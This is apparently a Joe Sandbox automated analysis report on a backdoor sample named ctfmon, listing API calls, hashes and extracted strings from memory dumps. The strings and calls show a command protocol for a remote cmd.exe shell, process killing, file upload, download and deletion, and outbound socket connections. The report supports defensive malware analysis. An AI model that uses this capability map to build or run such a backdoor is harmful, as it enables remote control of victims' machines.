        • Opcode ID: ed463503181f5831d49e387adaee184ff8ba96adf0051b103f264377ab2b9ac7
        • Instruction ID: 5e28298704729bcf50cadef609a26d81d9e057ba8ea632b21b4816b74d65386d
        • Opcode Fuzzy Hash: ed463503181f5831d49e387adaee184ff8ba96adf0051b103f264377ab2b9ac7
        • Instruction Fuzzy Hash: A3D09230304210AFCB05CFA0DA48A1ABBA2FF94704BA085A9E4468A121D736DC53EB49
        APIs
        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00421493
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CallbackDispatcherUser
        • String ID:
        • API String ID: 2492992576-0
        • Opcode ID: b47898489ddcb2b124179c95a74675b891bcc561428e8ec89230015038fb133d
        • Instruction ID: e93ab91fe77c0c32042803eb211a6ee4c214d71b7397e075563b18e63b4aab73
        • Opcode Fuzzy Hash: b47898489ddcb2b124179c95a74675b891bcc561428e8ec89230015038fb133d
        • Instruction Fuzzy Hash: 57D0A936004611AFC3216F18EC08ACBBFE0AF08310B01892EF48542431C7318C92DB88
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: c96f40a7069d522f032c98d5448b60f698f4b6c1c1402176db7ae5b90fe826fb
        • Instruction ID: aeaeee24bf346ca11c663ef522bbd7e48f8dbd3ce84c7fe3779714f86709666c
        • Opcode Fuzzy Hash: c96f40a7069d522f032c98d5448b60f698f4b6c1c1402176db7ae5b90fe826fb
        • Instruction Fuzzy Hash: C3B092765672209BD7249B449C426C43B989B0E704F410413DA01672A183F4248A5B9A
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Sleep
        • String ID:
        • API String ID: 3472027048-0
        • Opcode ID: c013994515969efd125ce41308ae6106bc53f087768421e2f80ded30106a1cfd
        • Instruction ID: 8d0532a3e790895bab5c54fbd4c8d4022f4858262944ead44d32b07c1e7971d2
        • Opcode Fuzzy Hash: c013994515969efd125ce41308ae6106bc53f087768421e2f80ded30106a1cfd
        • Instruction Fuzzy Hash: E7B0127652723087C3009B449C016C43AD85B0E704F410013C601772E083F424C55F9B
        APIs
        • timeGetTime.WINMM(?,00000000,6F7B59B0,6F7CEE50), ref: 0040205E
        • send.WS2_32(00000000,?,?,00000000), ref: 00402498
        • CreateThread.KERNEL32(00000000,00000000,00404AD0,00000000,00000000,00000000), ref: 004024C8
        • closesocket.WS2_32(00000000), ref: 004024DE
        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004025D2
        • TerminateProcess.KERNEL32(00000000,00000000), ref: 004025E4
        • CloseHandle.KERNEL32(00000000), ref: 004025EB
        • CreateThread.KERNEL32(00000000,00000000,00403DB0,00000000,00000000,00000000), ref: 0040261B
        • Sleep.KERNEL32(0000000A), ref: 0040263D
        • Sleep.KERNEL32(00000064), ref: 00402686
        • timeGetTime.WINMM(?,00000000,6F7B59B0,6F7CEE50), ref: 004021B8
          • Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(00000348,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
          • Part of subcall function 00402F20: ResetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F47
          • Part of subcall function 00402F20: SetEvent.KERNEL32(0000034C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
          • Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(0000034C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
          • Part of subcall function 00402F20: Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
          • Part of subcall function 00402F20: SetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F9E
        • WSAStartup.WS2_32(00000101,?), ref: 004022EB
        • htons.WS2_32(?), ref: 004022FB
        • inet_addr.WS2_32(?), ref: 00402312
        • inet_addr.WS2_32(?), ref: 0040231E
        • gethostbyname.WS2_32(?), ref: 0040232C
        • WSAGetLastError.WS2_32 ref: 00402338
        • socket.WS2_32(00000002,00000001,00000000), ref: 0040236E
        • connect.WS2_32(00000000,0053C7F0,00000010), ref: 0040239A
        • CreateThread.KERNEL32(00000000,00000000,004048D0,00000000,00000000,00000000), ref: 004023BB
        • Sleep.KERNEL32(000000C8), ref: 004023C6
        • send.WS2_32(00000000,?,?,00000000), ref: 00402409
        • closesocket.WS2_32(00000000), ref: 00402426
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Sleep$CreateEventThread$ObjectProcessSingleTimeWaitclosesocketinet_addrsendtime$CloseErrorHandleLastOpenResetStartupTerminateconnectgethostbynamehtonssocket
        • String ID: 0D: 1H:24M$%3dD:%2dH:%2dM$+*&=^^^^--------DRIVE$+*&=^^^^--------LOGON$675052$CMD++$CMD--$DELFI$DRIVE$DW-FI$DW-FS$DW-ST$FOAFI$I$INIT+$I{}*A$LOGON$NO+++$OPEN$PROCS$PROKL$PTPM1$PTPM2$RUN++$UP+FI$exit
        • API String ID: 2946247661-3225441740
        • Opcode ID: 4c66f216693427eca67d31e7d5f5d8469bb6819db60560e656a88f52c5bef81a
        • Instruction ID: 30f2b201198bb2a24bcc67c28f232b873d1066fbd5e9a9fc7583fe69ebf5afeb
        • Opcode Fuzzy Hash: 4c66f216693427eca67d31e7d5f5d8469bb6819db60560e656a88f52c5bef81a
        • Instruction Fuzzy Hash: BD5225326043049FDB24CF24D84476B7BA6BBD5300F45853EE94AAB3C1DFB99D0A8B59
        APIs
        • GetPropA.USER32(?,?), ref: 0041D765
        • CallWindowProcA.USER32(00000000), ref: 0041D787
          • Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
          • Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Prop$CallProcRemoveWindow
        • String ID: #32770
        • API String ID: 2276450057-463685578
        • Opcode ID: 659aa437e6f9b1db763d0980aaa66f1d77c78cae941e8152d1942417593f74f3
        • Instruction ID: 94ad4723163bdf2d308ea6e45922d28c75bada5694cf6dcea4a57aff3eeba185
        • Opcode Fuzzy Hash: 659aa437e6f9b1db763d0980aaa66f1d77c78cae941e8152d1942417593f74f3
        • Instruction Fuzzy Hash: B4811976B0530477D620BB55EC84FEF776CEF853A5F400427FA0182292D729A985C7BA
        APIs
        • WSAStartup.WS2_32 ref: 00404B01
        • htons.WS2_32(00000000), ref: 00404B33
        • htons.WS2_32(00000000), ref: 00404B3B
        • socket.WS2_32(00000002,00000001,00000000), ref: 00404B59
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: htons$Startupsocket
        • String ID: +*&=^^^^--------PTPM2
        • API String ID: 4109548558-2390715153
        • Opcode ID: e7629c067e5fdbe14b2d9f1b6ed21f636c11199621b624a142a10588866ee9f3
        • Instruction ID: 346ed77a3f42d4ca601688a76fa85a796bd0d35956720dbea263a7c1e4379ff6
        • Opcode Fuzzy Hash: e7629c067e5fdbe14b2d9f1b6ed21f636c11199621b624a142a10588866ee9f3
        • Instruction Fuzzy Hash: 349106715092449FD730CF24AC84AABBBF8EBD4310F44853FE54493390D779A94E9BA6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID:
        • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
        • API String ID: 0-1157002505
        • Opcode ID: b9510dcf841a2d8b4d4510080941060aba2e18d74fd39af2c763ac35744268c8
        • Instruction ID: 72ba9979bd33a82a7dc4d693d9c97e677760f1d98e671c18ae2a61919c5ed11a
        • Opcode Fuzzy Hash: b9510dcf841a2d8b4d4510080941060aba2e18d74fd39af2c763ac35744268c8
        • Instruction Fuzzy Hash: D2E1F131D9C209DEEB258F64C8457FE7BB1BB04304F68406BE851A6382D77C8AC2DB59
        APIs
        • CreatePipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403DEF
        • CreatePipe.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403E01
        • CreateProcessW.KERNEL32 ref: 00403E8E
        • Sleep.KERNEL32(000003E8), ref: 00403E99
        • Sleep.KERNEL32(000000C8), ref: 00403EE1
        • PeekNamedPipe.KERNEL32(?,00000000,00001000,?,00000000,00000000), ref: 00403EF8
        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00403F1B
        • WriteFile.KERNEL32(?,exit,00000006,?,00000000), ref: 004040F5
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CreatePipe$FileSleep$NamedPeekProcessReadWrite
        • String ID: +*&=^^^^--------CMD--$cmd.exe$exit$exit
        • API String ID: 4180828904-1671145255
        • Opcode ID: 97d2dc80daee14cd8b07cf939912a4cb6b383654e3bb96b0cd9faa687eacef6c
        • Instruction ID: b70c06b44eefa63bc239fc03f3aab28687b9ac6a1c24dff492d9dcfd48d6b085
        • Opcode Fuzzy Hash: 97d2dc80daee14cd8b07cf939912a4cb6b383654e3bb96b0cd9faa687eacef6c
        • Instruction Fuzzy Hash: 8AA18EB26043099FD714CF64D840BABBBE9BB88700F40493EF649E7380DA75AD068B56
        APIs
        • EnumProcesses.PSAPI(?,00001000,?,PROCS,?,004025AC), ref: 00403A3E
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00001000,?,PROCS,?,004025AC), ref: 00403A5B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CreateEnumProcessesSnapshotToolhelp32
        • String ID: +*&=^^^^--------PROCS$PROCS
        • API String ID: 3846999141-2662039986
        • Opcode ID: ec872aaca7dab5de4dc8b0dbbf1885990af5137ecd8fa4750e36b93221478237
        • Instruction ID: 624bcb37762edd4edd6f55eff34c223af5f14a6d3ea4ea25fcc202f1aac3f0d4
        • Opcode Fuzzy Hash: ec872aaca7dab5de4dc8b0dbbf1885990af5137ecd8fa4750e36b93221478237
        • Instruction Fuzzy Hash: 1361F3726043065BD720DF64DC81AAF77E9EFD8304F40093EF94597281EA79EA09C76A
        APIs
        • CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 0041CFAA
        • DefWindowProcA.USER32(00000000,?,?,?), ref: 0041CFBD
        • IsIconic.USER32(00000000), ref: 0041CFDF
        • SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 0041D00C
        • GetWindowLongA.USER32(00000000,000000F0), ref: 0041D01B
        • GetWindowDC.USER32(00000000), ref: 0041D05C
        • GetWindowRect.USER32(00000000,?), ref: 0041D06A
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041D0AD
        • InflateRect.USER32(?,000000FF,000000FF), ref: 0041D0D0
        • SelectObject.GDI32(00000000,?), ref: 0041D0DE
        • OffsetRect.USER32(?,?,00000000), ref: 0041D134
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
        • String ID:
        • API String ID: 2215177122-0
        • Opcode ID: 4307d82b0b8a792f120d9466698bca061e3411348b88fecfdab8711ea9572030
        • Instruction ID: 4c5bc5c323774a5c2da63429ddb1a7b1421399ae9eef4e28febc03626f88aa8e
        • Opcode Fuzzy Hash: 4307d82b0b8a792f120d9466698bca061e3411348b88fecfdab8711ea9572030
        • Instruction Fuzzy Hash: EE817971604301AFC310DF68DC84EABB7E4FB89318F004A2EF94493291E775E94ACB96
        APIs
        • FindResourceA.KERNEL32(?,?,00000002), ref: 0041F7D3
        • SizeofResource.KERNEL32(?,00000000,?,76944920,00000000,7693CF90,?,?,?,?,?,?,?,?,0041D411,00000001), ref: 0041F7ED
        • LoadResource.KERNEL32(?,00000000,?,76944920,00000000,7693CF90,?,?,?,?,?,?,?,?,0041D411,00000001), ref: 0041F7F7
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Resource$FindLoadSizeof
        • String ID:
        • API String ID: 507330600-0
        • Opcode ID: 246115ffcb21acfb6b612898e6a96047005db1a3dcca2133cc8e3dd41b22750f
        • Instruction ID: 9f6e833ce4930495a174d37efbb73787bb1f77972dd9fa55e7fbf6b8b2689a6a
        • Opcode Fuzzy Hash: 246115ffcb21acfb6b612898e6a96047005db1a3dcca2133cc8e3dd41b22750f
        • Instruction Fuzzy Hash: 6C41EF327042145BE70CCE299856AAF77D2EBC9350F448A3EF946C3381DF75950AC3A5
        APIs
        • __EH_prolog.LIBCMT ref: 00425860
        • GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 0042587E
        • lstrcpynW.KERNEL32(?,?,00000104), ref: 0042588D
        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004258C1
        • CharUpperW.USER32(?), ref: 004258D2
        • FindFirstFileW.KERNEL32(?,?), ref: 004258E8
        • FindClose.KERNEL32(00000000), ref: 004258F4
        • lstrcpyW.KERNEL32(?,?), ref: 00425904
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Find$CharCloseFileFirstFullH_prologInformationNamePathUpperVolumelstrcpylstrcpyn
        • String ID:
        • API String ID: 304730633-0
        • Opcode ID: eb2e77227feee21f3809df92a7e21bbd02d509cfcaef561014312a0744f67c22
        • Instruction ID: dc0638b164661f47167565fae3824bc1416e181e3646228fdecd816abe73c54b
        • Opcode Fuzzy Hash: eb2e77227feee21f3809df92a7e21bbd02d509cfcaef561014312a0744f67c22
        • Instruction Fuzzy Hash: 7F2192B1A00529EBCB20AF65EC48AEF7F7CFF05764F408126F819D2160D7348A46CBA4
        APIs
          • Part of subcall function 00424368: ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376
        • IsIconic.USER32(?), ref: 004013F1
          • Part of subcall function 004267B7: __EH_prolog.LIBCMT ref: 004267BC
          • Part of subcall function 004267B7: BeginPaint.USER32(?,?,?,?,0040140B), ref: 004267E5
        • SendMessageW.USER32(?,00000027,?,00000000), ref: 00401422
        • GetSystemMetrics.USER32(0000000B), ref: 00401430
        • GetSystemMetrics.USER32(0000000C), ref: 00401436
        • GetClientRect.USER32(?,?), ref: 00401443
        • DrawIcon.USER32(?,?,?,?), ref: 00401478
          • Part of subcall function 00426829: __EH_prolog.LIBCMT ref: 0042682E
          • Part of subcall function 00426829: EndPaint.USER32(?,?,?,?,00401487), ref: 0042684B
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: H_prologMetricsPaintSystem$BeginClientDrawIconIconicMessageRectSendShowWindow
        • String ID:
        • API String ID: 744365313-0
        • Opcode ID: 1e23e38091298bc23035b615d3f8958f05cf2239797f5dc484b3318349e7e02d
        • Instruction ID: 3cd01a1e54c5f11bb01f4eb2d2d637b62c3ac8db24f719d817f91ceb89e6c8c0
        • Opcode Fuzzy Hash: 1e23e38091298bc23035b615d3f8958f05cf2239797f5dc484b3318349e7e02d
        • Instruction Fuzzy Hash: F0118E713043155FC214EF38DC89E6F77A9EBC8308F444A29B585C3290DA74E80A8B55
        APIs
        • lstrcpyW.KERNEL32(-0000002C,?,76228FB0,00000000,00000000,00403769,*.*,00000000), ref: 00405FD9
        • FindFirstFileW.KERNEL32(?,?), ref: 00405FE3
        • GetLastError.KERNEL32 ref: 00405FF1
        • SetLastError.KERNEL32(0000007B,000000FF,00000000,?), ref: 0040603C
          • Part of subcall function 00424A36: lstrlenW.KERNEL32(?,00000000,00406084,000000FF,?,?,?,?,?,00000000,?), ref: 00424A49
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ErrorLast$FileFindFirstlstrcpylstrlen
        • String ID: *.*
        • API String ID: 334723784-438819550
        • Opcode ID: 0eb3c0ce6568269592c83524268b6381258269ac00d58bd2e77033d507aac4d6
        • Instruction ID: 5172b66741902352c281ddeba33db5bac7263c07da9d21b6aa86c91882e6205b
        • Opcode Fuzzy Hash: 0eb3c0ce6568269592c83524268b6381258269ac00d58bd2e77033d507aac4d6
        • Instruction Fuzzy Hash: 78214B72A407019BE730BB719C85E2BB298DF54764F110A3FF522B62C2EB7D8C018669
        APIs
          • Part of subcall function 00424202: GetWindowLongW.USER32(?,000000F0), ref: 0042420E
        • GetKeyState.USER32(00000010), ref: 0042360B
        • GetKeyState.USER32(00000011), ref: 00423614
        • GetKeyState.USER32(00000012), ref: 0042361D
        • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00423633
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: State$LongMessageSendWindow
        • String ID:
        • API String ID: 1063413437-0
        • Opcode ID: f08a36ac8abab3e89e4425618160d51b63b8717b140772f1c211ae5f2a27efec
        • Instruction ID: 218882e5c383a6313f97fdf1e6bc22957306ce5396ae17cae6112ddc5d99c2e4
        • Opcode Fuzzy Hash: f08a36ac8abab3e89e4425618160d51b63b8717b140772f1c211ae5f2a27efec
        • Instruction Fuzzy Hash: 26F0BE377403A936E5303AA22C42FAA81384B90FD6F80042AB701AA2D28D9D8943467C
        APIs
        • MonitorFromWindow.USER32(?,?), ref: 00405BB0
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
